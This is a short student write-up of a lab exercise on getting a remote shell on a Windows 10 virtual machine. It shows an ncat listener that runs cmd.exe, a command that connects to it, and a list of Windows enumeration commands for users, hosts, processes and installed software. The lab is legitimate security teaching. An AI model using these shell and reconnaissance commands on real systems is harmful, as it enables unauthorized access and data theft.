Popping Shells Lab

What we did

In our lab today, we took the roles of two different individuals to obtain a shell on a remote system. We used ncat to get the Shell on a Windows 10 Virtual Machine. The lab was to show us how an attacker would obtain a shell and how the attacker could decide which port to use and open the target's systems. This works if the victim is even on a Firewall. The victim would be tricked into opening a document or something else that would connect back to the attacker's Computer, giving them a shell to access their data.

Basic Commands Used

1. ncat -l 8001 -e cmd.exe -v
   Explanation: This started a listener on port 8001; when you connect, it will boot cmd.exe. -v is Verbose mode and allows you to see what is happening

2. ncat X.X.X.X 8001 Explanation: Connects to the Target IP on Port 8001

Important Terms

• NMap - Network Mapper
• Shell - A command line interface that allows us to talk to a machine via a command prompt
• Ip Address - A unique string of numbers that identify a device on a network

Useful Commands in the Shell

• Get the list of local users - net users

• Enumerate other hosts - net view

• Enumerate users on the domain - net users /DOMAIN

• List running processes - tasklist

• List of services - tasklist /svc

• allows enumeration of the internal systems without special tools like Nmap - arp -a

• After getting arp -a and the IP Addresses - tasklist /s IP_ADDRESS

• Get installed software versions - wmic product get name, version, installlocation

• Running process details - wmic process

• OS Details - wmic os

• User account details - wmic useraccount

• Detailed host information - sysinfo

Resources Used

• Shell-Lab-01
• Shell-Lab-02
• NMAP